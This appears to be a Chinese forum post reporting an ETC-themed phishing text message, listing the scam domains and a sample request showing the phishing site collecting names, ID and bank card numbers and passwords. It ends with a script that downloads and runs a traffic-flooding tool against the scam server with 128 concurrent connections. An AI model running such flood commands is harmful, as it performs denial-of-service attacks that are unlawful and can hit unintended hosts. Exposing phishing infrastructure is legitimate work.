|
本帖最后由 maintell 于 2021-9-16 18:28 编辑
刚刚收到短信:
【重要通知】系统更新导致您的etc被锁定,请于9月16号前点开jg.houvz.xyz 解除禁用,否则将影响出行
骗子用了一个很长的域名:
mwxsohylpmusrl.mfuznpeedcollg.dkwmhlkxgl.snrlweqzc.jjmaqshcyfcmak.bkidf.nnktofuf.iaozkcjnv.ktgobhaaccdeon.qwead.fnpjkajqn.top
现在骗子都这么没技术含量的吗?
发一个测试的payload :
Request URL: http://mwxsohylpmusrl.mfuznpeedcollg.dkwmhlkxgl.snrlweqzc.jjmaqshcyfcmak.bkidf.nnktofuf.iaozkcjnv.ktgobhaaccdeon.qwead.fnpjkajqn.top/business/t-ec-info/saveDetailInfo
{"uname":"莫天","idCard":"420101198402279160","cardPhone":"15770239843","os":null,"cardNumber":"8701000077313182","cardName":"储蓄卡-浦东发展银行","cardType":"","cardPass":"96665813454","tk":"7823fba1-870c-4140-a7fd-6c29b83e3355","ipAddr":""}
骗子服务器在vultr, 连个cdn都不套
刷流量脚本如下:
wget https://github.com/maintell/webBenchmark/releases/download/0.2/webBenchmark_linux_x64 -o webBenchmark_linux_x64
chmod +x webBenchmark_linux_x64
./webBenchmark_linux_x64 -s http://vmkehlsd.bevhd.qkrxyvzhvlfygg.yheiizcodb.tnendgol.kovgr.bcwyfywsmqwcle.ofdl.llhitkypke.qwead.fnpjkajqn.top/gsgovrz/app/hometu.jpg -c 128
|
|